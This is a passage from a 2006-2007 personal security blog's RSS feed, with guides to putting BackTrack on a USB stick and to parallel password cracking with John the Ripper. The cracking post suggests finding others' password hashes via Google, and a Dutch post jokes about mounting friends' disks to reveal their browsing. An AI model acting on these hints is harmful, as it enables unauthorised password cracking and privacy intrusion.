&lt;p&gt;The script needs to run every minute to check for new ip-addresses written to the tmp file, which is accomplished by using a crontab entry:&lt;br/&gt;
&lt;code&gt;&lt;br/&gt;
* * * * * /usr/local/bin/allow-ssh.sh &amp;gt; /dev/null 2&amp;gt;&amp;amp;1&lt;br/&gt;
&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;i&gt;original version:&lt;/i&gt;&lt;br/&gt;
&lt;a class=&#34;extlink&#34; href=&#34;http://gentoo-wiki.com/TIP_turn_sshd_on_from_php&#34; target=&#34;_blank&#34;&gt;http://gentoo-wiki.com/TIP_turn_sshd_on_from_php&lt;/a&gt;&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>de ultieme hacker toolkit aan je sleutelhanger</title>
      <link>https://www.oiepoie.nl/2007/03/07/de-ultieme-hacker-toolkit-aan-je-sleutelhanger/</link>
      <pubDate>Wed, 07 Mar 2007 15:29:34 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2007/03/07/de-ultieme-hacker-toolkit-aan-je-sleutelhanger/</guid>
      <description>&lt;p&gt;&lt;b&gt;20080309 update: Deze post gaat over BackTrack 2, ondertussen is BackTrack 3 beta beschikbaar, deze kan veel eenvoudiger op een USB stick geinstalleerd worden, je krijgt bovendien meer tools en de laatste versies:&lt;br/&gt;
&lt;a href=&#34;https://www.oiepoie.nl/2008/03/09/backtrack-3-on-a-usb-stick-ultimate-hacker-tool-on-your-keychain/&#34;&gt;Installing BackTrack 3 on a USB stick&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;In Linux land kennen we al lang de zogenaamde “bootable distributions”, dat is een compleet Linux operating systeem plus alle applicaties op een cdrom of dvd die je in de computer kan stoppen om er vervolgens van te booten. Vervolgens heb je na een paar minuten een Linux desktop tot je beschikking zonder dat er ook maar een byte op je harde schijf wordt veranderd.&lt;/p&gt;
&lt;p&gt;Een afgeleide hiervan zijn de “bootable security distributions”, dit is hetzelfde verhaal, alleen is de cdrom volgepakt met security tools om b.v. het netwerk mee te scannen, wachtwoorden te testen op hun sterkte enz. Extra handig zijn de forensische tools waarmee je op de harde schijf van de geboote pc kan gaan zoeken naar informatie over het gebruik, b.v. browser gegevens maar ook gewiste bestanden zijn weer boven water te halen. Als je de harde schijf van de PC in read-only mode mount (mount -o r /dev/sda /media/disk) dan wordt er nog steeds geen byte op de disk veranderd.&lt;/p&gt;
&lt;p&gt;Belangrijk van security distro’s is vooral dat ze recente programmatuur bevatten. Enerzijds is dit vaak nodig om van de PC in kwestie te kunnen booten en goede ondersteuning te hebben voor de hardware in de PC, bv. (wireless) netwerkkaart, videodriver, enz. en anderzijds zijn de nieuwere tools doorontwikkeld en kunnen ze meer of werken ze sneller.&lt;/p&gt;
&lt;p&gt;Na Whoppix, Whax, Auditor, STD, Phlak en wat al niet meer, is de ster aan het firnament op dit moment &lt;a class=&#34;extlink&#34; href=&#34;http://www.remote-exploit.org/backtrack.html&#34; target=&#34;_blank&#34;&gt;BackTrack&lt;/a&gt;, te vinden op &lt;a class=&#34;extlink&#34; href=&#34;http://www.remote-exploit.org&#34; target=&#34;_blank&#34;&gt;www.remote-exploit.org&lt;/a&gt;.&lt;br/&gt;
Backtrack Final 2.0 is net uit en staat volgepakt met allerlei interessante software, het is ideaal om er mee te experimenteren op je eigen computer en te zien hoeveel informatie er achter blijft waarvan je het bestaan niet wist. Ook kan je goed testen of je eigen (wireless) netwerk veilig is voor hackers en of je wachtwoorden wel voldoende onkraakbaar zijn.&lt;/p&gt;
&lt;p&gt;Nog leuker wordt het als je backtrack om een 1GB USB stick zet en hem meeneemt om bij computers van kennisen de guru uit te hangen door in een minuutje hun brave windows PC om te toveren in een volwaardig hacker workstation. Terwijl je in een desktop het station “Secret Agent” van &lt;a class=&#34;extlink&#34; href=&#34;http://somafm.com/listen/&#34; target=&#34;_blank&#34;&gt;SomaFM&lt;/a&gt; draait, mount je hun harde schijf en vertel je welke websites ze de laatste tijd hebben bezocht, zo heb je je eigen “Shock and Awe” campagne.&lt;/p&gt;
&lt;p&gt;Behalve voor de security tools, is zo’n bootable usb omgeving ook bijzonder geschikt om zelf veilig van te werken, b.v. als je dingen op Internet wilt nakijken zonder het risico om spyware of virussen op te lopen, of om je e-mail te lezen zonder dat er (software)keyloggers of trojans zijn die “meekijken”, ook laat je geen history achter op de computer die je gebruikt hebt.&lt;/p&gt;
&lt;center&gt;&lt;b&gt;Hoe installeer je backtrack 2.0 op een USB stick?&lt;/b&gt;&lt;/center&gt;&lt;br/&gt;
&lt;br/&gt; &lt;br/&gt;
Download de iso, b.v. &lt;a class=&#34;extlink&#34; href=&#34;http://ftp.belnet.be/packages/backtrack/bt2final.iso&#34; target=&#34;_blank&#34;&gt;hier&lt;/a&gt; vandaan.&lt;br/&gt;
&lt;br/&gt; &lt;br/&gt;
Stop de USB stick in je PC, als die automatisch gemount wordt (meestal te zien aan pop-up windows met de inhoud v/d thumbdrive), sluit de windows en unmount de stick (kijkt met het command &lt;b&gt;mount&lt;/b&gt; en dan: &lt;b&gt;umount /dev/sd..&lt;/b&gt;).&lt;br/&gt;
Als er niets te zien is na het insteken v/d USB stick kan je met &lt;b&gt;dmesg | tail &lt;/b&gt; meestal wel zien als welk device het herkent wordt. In het verhaal hieronder gaan we uit van &lt;b&gt;/dev/sdb&lt;/b&gt; en ook moeten (bijna) alle commando’s als root worden uitgevoerd.
&lt;p&gt;Herpartitioneer de USB stick met:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# fdisk /dev/sdb
&lt;/pre&gt;
&lt;p&gt;Maak twee partities:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# fdisk /dev/sdb
&lt;p&gt;The number of cylinders for this disk is set to 2575.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;software that runs at boot time (e.g., old versions of LILO)&lt;/li&gt;
&lt;li&gt;booting and partitioning software from other OSs
(e.g., DOS FDISK, OS/2 FDISK)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Command (m for help): p&lt;/p&gt;
&lt;p&gt;Disk /dev/sdb: 1020 MB, 1020788224 bytes
129 heads, 6 sectors/track, 2575 cylinders
Units = cylinders of 774 * 512 = 396288 bytes&lt;/p&gt;
&lt;p&gt;Device Boot      Start         End      Blocks   Id  System
/dev/sdb1            1              2575     996522  c  W95 FAT32 (LBA)&lt;/p&gt;
&lt;p&gt;Command (m for help): d
Selected partition 1&lt;/p&gt;
&lt;p&gt;Command (m for help): n
Command action
e   extended
p   primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-2575, default 1):
Using default value 1
Last cylinder or +size or +sizeM or +sizeK (1-2575, default 2575): +760M&lt;/p&gt;
&lt;p&gt;Command (m for help): n
Command action
e   extended
p   primary partition (1-4)
p
Partition number (1-4): 2
First cylinder (1895-2575, default 1895):
Using default value 1895
Last cylinder or +size or +sizeM or +sizeK (1895-2575, default 2575):
Using default value 2575&lt;/p&gt;
&lt;p&gt;Command (m for help): t
Partition number (1-4): 1
Hex code (type L to list codes): c
Changed system type of partition 1 to c (W95 FAT32 (LBA))&lt;/p&gt;
&lt;p&gt;Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): c
Changed system type of partition 2 to c (W95 FAT32 (LBA))&lt;/p&gt;
&lt;p&gt;Command (m for help): a
Partition number (1-4): 1&lt;/p&gt;
&lt;p&gt;Command (m for help): p&lt;/p&gt;
&lt;p&gt;Disk /dev/sdb: 1020 MB, 1020788224 bytes
129 heads, 6 sectors/track, 2575 cylinders
Units = cylinders of 774 * 512 = 396288 bytes&lt;/p&gt;
&lt;p&gt;Device Boot      Start         End      Blocks   Id  System
/dev/sdb1   *           1        1919      742650    c  W95 FAT32 (LBA)
/dev/sdb2            1920        2575      253872    c  W95 FAT32 (LBA)&lt;/p&gt;
&lt;p&gt;Command (m for help): w
The partition table has been altered!&lt;/p&gt;
&lt;p&gt;Calling ioctl() to re-read partition table.&lt;/p&gt;
&lt;p&gt;WARNING: If you have created or modified any DOS 6.x
partitions, please see the fdisk manual page for additional
information.
Syncing disks.
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;en zet er de juiste filesystems op met:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# mkfs.vfat -v /dev/sdb1
# mkfs.vfat -v /dev/sdb2
&lt;/pre&gt;
&lt;p&gt;De tweede partitie is alleen maar een handigheidje, je hebt nu de mogelijkheid om bij gebruik met backtrack om hier tijdelijke bestanden naar toe te kopieeren, maar je kan de stick ook nog steeds als gewone datadrager gebruiken onder b.v. Windows.&lt;/p&gt;
&lt;p&gt;Mount de backtrack iso via het loopback device en mount de eerste partitie v/d USB stick&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# mkdir /FF
# mount -o loop bt2final.iso /FF
# mkdir /FF1
# mount -o rw /dev/sdb1 /FF1
&lt;/pre&gt;
&lt;p&gt;Kopieer de bestanden:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# cd /FF1
# cp -r /FF/* .
&lt;/pre&gt;
&lt;p&gt;De partitie is net voldoende voor alles:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# df -h /FF1
Filesystem            Size  Used Avail Use% Mounted on
/dev/sdb1             724M  4.0K  724M   1% /FF1
&lt;/pre&gt;
&lt;p&gt;Nu nog ervoor zorgen dat de USB stick bootable is, hiervoor heb je het pakket syslinux nodig. Als het niet op je computer staat kan je het met yum, apt-get, emerge, enz. installeren afhankelijk van je gebruikte distributie.&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# umount /FF1
# syslinux /dev/sdb1
# cat /usr/lib/syslinux/mbr.bin &amp;gt; /dev/sdb
&lt;/pre&gt;
&lt;p&gt;Er is nog wat finetuning nodig voor syslinux om echt te kunnen booten:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
# mount -o rw /dev/sdb1 /FF1
# cd /FF1/boot/isolinux
#  perl -pe &#39;s#/boot/##&#39;  isolinux.cfg&amp;gt; /FF1/syslinux.cfg
# mv boot/vmlinuz .
# mv boot/initrd.gz .
# cd
# umount /FF1
&lt;/pre&gt;
&lt;p&gt;That’s all folks. Reboot, zorg dat de PC probeert op te starten van USB en backtrack start op en dan zie je:&lt;br/&gt;
&lt;/p&gt;&lt;center&gt;&lt;img src=&#34;https://www.oiepoie.nl/pics/bt2final.png&#34;/&gt;&lt;/center&gt;
&lt;p&gt;Mocht je geen linux systeem hebben, maar toch die bootable USB stick willen hebben, brand dan de backtrack iso die je hebt gedownload op cdrom en start daar van op, vervolgens heb je een linux systeem draaien en kan je het bovenstaande verhaal volgen.&lt;/p&gt;
&lt;p&gt;Tip: installeer &lt;a class=&#34;extlink&#34; href=&#34;http://www.vmware.com/products/server/&#34; target=&#34;_blank&#34;&gt;vmware server&lt;/a&gt;, maak een vrij kaal linux systeem aan&lt;br/&gt;
en laat vervolgens de cdrom drive verwijzen naar de backtrack iso. Nu zal in vmware backtrack worden geboot en kan je daar zonder restricties in&lt;br/&gt;
“spelen” en b.v. je host systeem via het vmware netwerk laten scannen.&lt;/p&gt;
&lt;p&gt;have fun!&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Caveat Lector!&lt;/b&gt;&lt;br/&gt;
Volgens de nieuwe wet Computercriminaliteit is het  voorradig hebben van hulpmiddelen die bedoeld zijn om niet alleen in te breken, maar ook gegevens op te slaan (onze 2e partitie?) of een systeem wederrechtelijk te gebruiken, strafbaar met maximaal vier jaar cel!&lt;/p&gt;
&lt;p&gt;Zie: &lt;a class=&#34;extlink&#34; href=&#34;http://www.iusmentis.com/beveiliging/hacken/computercriminaliteit/computervredebreuk/&#34; target=&#34;_blank&#34;&gt;De Wet Computercriminaliteit: Computervredebreuk&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Mijn intentie is om de USB stick prive te gebruiken om te controleren dat mijn eigen systemen veilig zijn en voor voorlichting van vrienden en kennissen, en dat is volkomen legaal (anders zou nl. iedere computergebruiker strafbaar zijn, want op ieder systeem staan wel programma’s die je kan gebruiken om te scannen of in te breken, b.v. ping tracert, telnet, enz. Het komt alleen op de kennis en de intentie van de gebruiker aan om ze ook als zodanig te gebruiken).&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>High speed password cracking with John the Ripper</title>
      <link>https://www.oiepoie.nl/2007/02/11/high-speed-password-cracking-with-john-the-ripper/</link>
      <pubDate>Sun, 11 Feb 2007 20:08:06 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2007/02/11/high-speed-password-cracking-with-john-the-ripper/</guid>
      <description>&lt;p&gt;&lt;a extlink=&#34;&#34; href=&#34;http://en.wikipedia.org/wiki/John_the_Ripper&#34; target=&#34;_blank class=&#34;&gt;John the Ripper&lt;/a&gt; has been out there for a long time, it’s a great tool for auditing passwords. How does it work, well simple: you take a password file with encrypted (or better hashed) passwords in it and give it to John. The program will first determine what kind of hash algorithm is used and will then start by taking normal words from an extensive wordlist and feed them one by one through the same hash algorithm. If the outcome matches with what is in the file that word is obviously the password.&lt;/p&gt;
&lt;p&gt;After John has exhausted the wordlist it will try variations on the words. It will start every word with a capital and do the whole list again, than it could try every word backwards, substitute all letter “o” with zero’s, “i” with ones, “s” with “$”, and so on. Since computers have become mindboggling fast it can try a massive amount of combinations in a relative short time.&lt;/p&gt;
&lt;p&gt;Since John the Ripper is around for a couple of years, it is written to be run on a single CPU. This is kind of a waste since we all got these dual core machines on our desks and even quad core’s or more in the servers in the racks. So how to make use of all this processing power?&lt;/p&gt;
&lt;p&gt;Luckily there is a patch for John which allows it to use the &lt;a class=&#34;extlink&#34; href=&#34;http://www.mpi-forum.org/&#34; target=&#34;_blank&#34;&gt;Message Passing Interface&lt;/a&gt; to run multiple instances simultaneously, you can download this version: &lt;a class=&#34;extlink&#34; href=&#34;http://www.bindshell.net/tools/johntheripper/john-1.7.2-bp17-mpi2.tar.gz&#34; target=&#34;_blank&#34;&gt;john-1.7.2-bp17-mpi2.tar.gz&lt;/a&gt;&lt;br/&gt;
and build it on your dual core box. Before the code will compile you need to install the MPI software, with yum on fedora this can be done with:&lt;/p&gt;
&lt;pre&gt;yum -y install openmpi*&lt;/pre&gt;
&lt;p&gt;next get the software (if not already done so), extract and move in there:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
wget http://www.bindshell.net/tools/johntheripper/john-1.7.2-bp17-mpi2.tar.gz
gtar zxvf john-1.7.2-bp17-mpi2.tar.gz
cd john-1.7.2-bp17-mpi2/src
&lt;/pre&gt;
&lt;p&gt;Make a small adaptation to the Makefile so it will work with openmpi:&lt;/p&gt;
&lt;pre&gt;
vim Makefile&lt;br/&gt;
:%s/mpicc/om-mpicc/g&lt;br/&gt;
:wq&lt;br/&gt;
&lt;/pre&gt;
&lt;p&gt;Now build the beast:&lt;/p&gt;
&lt;pre&gt;
make linux-x86-mmx
&lt;/pre&gt;
&lt;p&gt;If all goes well, you will see some warnings about pointers, but no errors and end up with a executable in &lt;b&gt;../run/john&lt;/b&gt;. Now change directory to&lt;br/&gt;
../run&lt;br/&gt;
and get hold of a shadow file, a .htaccess, a ldif with userpasswords, or anything  with hashed passwords you would like to reverse back to the original form. If you don’t have anything yourself use Google with the right query to find something on the Net.&lt;br/&gt;
Give John his first assignment with the commandline:&lt;/p&gt;
&lt;pre&gt;
om-mpirun -np 2 ./john -incremental my-hash-file.txt
&lt;/pre&gt;
&lt;p&gt;The “-np 2” means that the “Number of Processors” is 2.&lt;br/&gt;
This is also the value to use if you have a single CPU machine with hyperthreading enabled.&lt;/p&gt;
&lt;p&gt;Now if you want to get serious with decrypting hashed passwords, get the right wordlist for your language since people love to choose simple words they can easily remember. This is a good source:&lt;br/&gt;
&lt;a class=&#34;extlink&#34; href=&#34;ftp://ftp.mirrorgeek.com/openwall/wordlists/&#34; target=&#34;_blank&#34;&gt;ftp://ftp.mirrorgeek.com/openwall/wordlists&lt;/a&gt;&lt;br/&gt;
You can use the specific wordlist with John this way:&lt;/p&gt;
&lt;pre class=&#34;noscroll&#34;&gt;
om-mpirun -np 2 ./john --wordlist=dutch_lower.txt my-hash-file.txt
&lt;/pre&gt;
&lt;p&gt;So, when all is said and done, the main question remains. How fast is it?&lt;br/&gt;
Well John the Ripper has a build in benchmark function which you can&lt;br/&gt;
activate by using &lt;b&gt;john -test&lt;/b&gt;, you then get lots of data for&lt;br/&gt;
all different ciphers which John supports.&lt;/p&gt;
&lt;p&gt;I will take “FreeBSD MD5 [32/64 X2]” as a comparison metric.&lt;/p&gt;
&lt;p&gt;On my Pentium D920 desktop running at 3.4GHz with linux /proc/cpuinfo:&lt;/p&gt;
&lt;pre&gt;
&lt;/pre&gt;&lt;table&gt;&lt;tr&gt;
&lt;td&gt;cpu family&lt;/td&gt;&lt;td&gt;: 15&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td&gt;model&lt;/td&gt;&lt;td&gt;: 6&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td&gt;model name&lt;/td&gt;&lt;td&gt;: Intel(R) Pentium(R) D CPU 3.40GHz&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td&gt;stepping&lt;/td&gt;&lt;td&gt;: 2&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;table border=&#34;1&#34;&gt;
&lt;tr&gt;
&lt;td&gt;dual cpu: &lt;/td&gt;
&lt;td&gt;Raw: 23511.00 c/s real&lt;/td&gt;
&lt;td&gt;23488.00 c/s virtual&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;single cpu: &lt;/td&gt;
&lt;td&gt;Raw: 11786.00 c/s real&lt;/td&gt;
&lt;td&gt;11786.00 c/s virtual&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;On my laptop: Core Duo CPU T2500 at 2.0GHz with linux /proc/cpuinfo:&lt;/p&gt;
&lt;pre&gt;
&lt;/pre&gt;&lt;table&gt;&lt;tr&gt;
&lt;td&gt;cpu family&lt;/td&gt;&lt;td&gt;: 6&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td&gt;model&lt;/td&gt;&lt;td&gt;: 14&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td&gt;model name&lt;/td&gt;&lt;td&gt;: Intel(R) CPU T2500  @ 2.00GHz&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;
&lt;td&gt;stepping&lt;/td&gt;&lt;td&gt;: 8&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;table border=&#34;1&#34;&gt;
&lt;tr&gt;
&lt;td&gt;dual cpu: &lt;/td&gt;
&lt;td&gt;Raw: 9622.00 c/s real&lt;/td&gt;
&lt;td&gt;10106.00 c/s virtual&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;single cpu: &lt;/td&gt;
&lt;td&gt;Raw: 5061.00 c/s real&lt;/td&gt;
&lt;td&gt;5061.00 c/s virtual&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;So what if this is not fast enough? There are two a number of roads you can take. There is &lt;b&gt;Distributed Network Attack&lt;/b&gt;, this is  like Seti at Home, where one master chops up the task at hand and delivers small chunks to thousands of computers which all complete the computations in spare processor time and then feed back the result to the master. The &lt;a class=&#34;extlink&#34; href=&#34;http://www.washingtonpost.com/wp-dyn/articles/A6098-2005Mar28.html&#34; target=&#34;_blank&#34;&gt;Secret Service&lt;/a&gt; has linked 4000 computers this way to try and decrypt passwords which it can’t break with “normal” supercomputer power.&lt;br/&gt;
You can build your own DNA password cracking universum by using &lt;a class=&#34;extlink&#34; href=&#34;http://freshmeat.net/projects/djohn/&#34; target=&#34;_blank&#34;&gt;Distributed John&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;An other way would be using &lt;a class=&#34;extlink&#34; href=&#34;http://en.wikipedia.org/wiki/Rainbow_tables&#34; target=&#34;_blank&#34;&gt;Rainbow Tables&lt;/a&gt; where every possible password is already translated to it’s hash value. So if you have a hash from a password file and you want to know to which password it belongs, you can just do a lookup in the giant rainbow table and find the password.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Caveat Lector!&lt;/b&gt;&lt;br/&gt;
Usage of tools like “John the Ripper” might be unlawfull or illegal in your country, if you want to test strenght of passwords on systems which are not your own, get written permission of the owner first.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>Gratis boek “Forensic Discovery”</title>
      <link>https://www.oiepoie.nl/2006/12/21/gratis-boek-forensic-discovery/</link>
      <pubDate>Thu, 21 Dec 2006 16:38:02 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2006/12/21/gratis-boek-forensic-discovery/</guid>
      <description>&lt;p&gt;Het boek &lt;a class=&#34;extlink&#34; href=&#34;http://www.porcupine.org/forensics/forensic-discovery/&#34; target=&#34;_new&#34;&gt;Forensic Discovery&lt;/a&gt; geschreven door &lt;a href=&#34; href=&#34; http:=&#34;&#34;&gt;Wietse Venema&lt;/a&gt; en &lt;a class=&#34;extlink&#34; x=&#34;&#34;&gt;Dan Farmer&lt;/a&gt; de schrijvers van de &lt;a class=&#34;extlink&#34; href=&#34;http://www.porcupine.org/forensics/tct.html&#34; target=&#34;_new&#34;&gt; The Coroner’s Toolkit (TCT)&lt;/a&gt; is nu online te lezen en te downloaden.&lt;br/&gt;
Computer forensics is een fascinerend onderwerp, net zoals de patholoog anatoom uit een dood lichaam kan achterhalen wat men als laatste gegeten heeft en waar men aan overleden is, kan je van een computer ontzettend veel informatie achterhalen over het gebruik daarvan. Dat kan natuurlijk erg nuttig zijn als de vorige eigenaar wordt verdacht van crimineele feiten, maar het is ook interessant om op je eigen computer te doen om eens te achterhalen hoeveel digitale sporen je achterlaat als je een website bezoekt of een e-mail leest.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>Gratis boek “Forensic Discovery”</title>
      <link>https://www.oiepoie.nl/2006/12/21/gratis-boek-forensic-discovery/</link>
      <pubDate>Thu, 21 Dec 2006 16:38:02 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2006/12/21/gratis-boek-forensic-discovery/</guid>
      <description>&lt;p&gt;Het boek &lt;a class=&#34;extlink&#34; href=&#34;http://www.porcupine.org/forensics/forensic-discovery/&#34; target=&#34;_new&#34;&gt;Forensic Discovery&lt;/a&gt; geschreven door &lt;a href=&#34; href=&#34; http:=&#34;&#34;&gt;Wietse Venema&lt;/a&gt; en &lt;a class=&#34;extlink&#34; x=&#34;&#34;&gt;Dan Farmer&lt;/a&gt; de schrijvers van de &lt;a class=&#34;extlink&#34; href=&#34;http://www.porcupine.org/forensics/tct.html&#34; target=&#34;_new&#34;&gt; The Coroner’s Toolkit (TCT)&lt;/a&gt; is nu online te lezen en te downloaden.&lt;br/&gt;
Computer forensics is een fascinerend onderwerp, net zoals de patholoog anatoom uit een dood lichaam kan achterhalen wat men als laatste gegeten heeft en waar men aan overleden is, kan je van een computer ontzettend veel informatie achterhalen over het gebruik daarvan. Dat kan natuurlijk erg nuttig zijn als de vorige eigenaar wordt verdacht van crimineele feiten, maar het is ook interessant om op je eigen computer te doen om eens te achterhalen hoeveel digitale sporen je achterlaat als je een website bezoekt of een e-mail leest.&lt;/p&gt;
</description>
    </item>
    
    <item>
      <title>bootable security distro on your USB stick</title>
      <link>https://www.oiepoie.nl/2006/12/20/bootable-security-distro-on-your-usb-stick/</link>
      <pubDate>Wed, 20 Dec 2006 23:26:25 +0100</pubDate>
      
      <guid>https://www.oiepoie.nl/2006/12/20/bootable-security-distro-on-your-usb-stick/</guid>
      <description>&lt;p&gt;&lt;b&gt;20080309 update: This article covers BackTrack 2, you might want to consider reading the information on how to install BackTrack 3 beta on a USB stick. This is a much easier process, you will get more tools and the latest versions:&lt;br/&gt;
&lt;a href=&#34;https://www.oiepoie.nl/2008/03/09/backtrack-3-on-a-usb-stick-ultimate-hacker-tool-on-your-keychain/&#34;&gt;Installing BackTrack 3 on a USB stick&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;Bootable linux security distributions come and go, first there was Whoppix, than it became Whax and parallel there also was Auditor. But now we have got &lt;a class=&#34;extlink&#34; href=&#34;http://www.remote-exploit.org/index.php/BackTrack&#34; target=&#34;_blank&#34;&gt;BackTrack&lt;/a&gt;. If Whoppix was the swiss army knife of a security auditor, than backtrack is his lightsword.&lt;/p&gt;
&lt;p&gt;So what can we do with &lt;b&gt;BackTrack&lt;/b&gt;? You can use it for security auditing, penetration testing, reconnaissance, wardriving, (wireless) network problem solving, actually a better question would be, what can’t you do with backtrack? &lt;/p&gt;
&lt;p&gt;So what’s the ultimate geeky thing to do with backtrack? Install it on a USB stick and turn any computer into a stealth auditor toolkit. Today’s 1 gigabyte USB sticks cost less than 20 euro and are all USB-2.0 compliant, so they are fast to boot from. It’s important to stay current with these security distro’s, because if you try a penetration test with old tools, you might as well not do it at all. So we will use the latest beta which is available at the time of writing (bt20061013) and show you how to install that on a bootable thumbdrive.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;step 1&lt;/b&gt;&lt;br/&gt;
Take the USB stick and plug it into a linux computer. If it mounts automagically, become root, type &lt;b&gt;mount&lt;/b&gt; and remember the device which belongs to the USB stick (mostly something like /dev/sdc) and &lt;b&gt;umount&lt;/b&gt; the device.&lt;br/&gt;
If it doesn’t mount automagically, type &lt;b&gt; dmesg | tail&lt;/b&gt; and you will see the device that was recognized by the kernel.&lt;br/&gt;
Now run fdisk on the device (e.g. &lt;b&gt;fdisk /dev/sdc&lt;/b&gt;) destroy all existing partitions and start a new (primary) one which starts at cylinder 1 and ends at &lt;b&gt;+650M&lt;/b&gt; which will suffice for the complete backtrack toolkit. Next you can create a second partition (also primary) which fills up the rest of the USB stick and will allow you to use it the way it was intended (for instance transporting files), but is can also come in very handy to put discovered forensic data on that partition. Change both types of the partition to &lt;b&gt;c&lt;/b&gt; which is W95 fat32 (lba). Don’t forget to make the first partition bootable.&lt;br/&gt;
Write the partition table to disk (USB drive) and exit fdisk. Now &lt;b&gt;fdisk -l /dev/sdc&lt;/b&gt; should give you something like:&lt;/p&gt;
&lt;pre&gt;
Disk /dev/sdc: 1020 MB, 1020788224 bytes
129 heads, 6 sectors/track, 2575 cylinders
Units = cylinders of 774 * 512 = 396288 bytes
&lt;p&gt;Device Boot      Start         End      Blocks   Id  System
/dev/sdc1   *           1        1641      635064    c  W95 FAT32 (LBA)
/dev/sdc2            1642        2575      361458    c  W95 FAT32 (LBA)
&lt;/pre&gt;&lt;/p&gt;
&lt;p&gt;Next, put a filesystem on both partitions with:&lt;br/&gt;
&lt;b&gt;mkfs.vfat -v /dev/sdc1&lt;/b&gt;&lt;br/&gt;
and repeat that for &lt;b&gt;/dev/sdc2&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;step 2&lt;/b&gt;&lt;br/&gt;
If you haven’t downloaded bt20061013.iso do so now and mount the iso image via the loopback device:&lt;br/&gt;
&lt;b&gt;mount -r -o loop /data/iso/bt20061013.iso /FF4/&lt;/b&gt;&lt;br/&gt;
also mount the first partition of our USB drive:&lt;br/&gt;
&lt;b&gt;mount -o rw /dev/sdc1 /FF&lt;/b&gt;&lt;br/&gt;
and start copying:&lt;br/&gt;
&lt;b&gt; cd /FF4/&lt;br/&gt;
cp -r * /FF/&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;step 3&lt;/b&gt;&lt;br/&gt;
To make the device bootable we will use the syslinux package, if it’s not on your linux system install it with &lt;b&gt;yum install syslinux&lt;/b&gt; (or use emerge, apt-get, or whatever). Now do the magic:&lt;/p&gt;
&lt;pre&gt;
# umount /FF
# syslinux /dev/sdc1
# cat /usr/lib/syslinux/mbr.bin &amp;gt; /dev/sdc
&lt;/pre&gt;
&lt;p&gt;and there are a few more steps to make it really work:&lt;/p&gt;
&lt;pre&gt;
# mount -o rw /dev/sdc1 /FF
# cd /FF
# perl -pe &#39;s/boot\///&#39; isolinux.cfg &amp;gt; syslinux.cfg
# mv boot/vmlinuz .
# mv boot/initrd.gz .
# cd
# umount /FF
&lt;/pre&gt;
&lt;p&gt;&lt;b&gt;step 4&lt;/b&gt;&lt;br/&gt;
put the USB drive in your computer and reboot and see if it boot’s from the USB stick. You might need to alter your BIOS settings for this to happen, or hit some kind of magic key during startup (my DELL laptop requires F12). If all goes well you will end up with:&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://www.oiepoie.nl/pics/backtrack.jpg&#34;/&gt;&lt;/p&gt;
&lt;p&gt;Have fun! and don’t forget to read the &lt;a extlink=&#34;&#34; href=&#34;http://www.remote-exploit.org/index.php/Tutorials&#34; target=&#34;_blank class=&#34;&gt;tutorials&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Windows&lt;/b&gt;&lt;br/&gt;
If you are on a Windows system and don’t have Linux installed, you can still follow the same procedure by downloading and booting &lt;a extlink=&#34;&#34; href=&#34;http://www.knopper.net/knoppix/index-en.html&#34; target=&#34;_blank class=&#34;&gt;knoppix&lt;/a&gt;. When the backtrack iso is on your C: or D: drive, knoppix will automatically mount and show these drives, and you can still mount the iso via the loopback device (-o loop) as described above.&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Other ways of playing around with backtrack&lt;/b&gt;&lt;br/&gt;
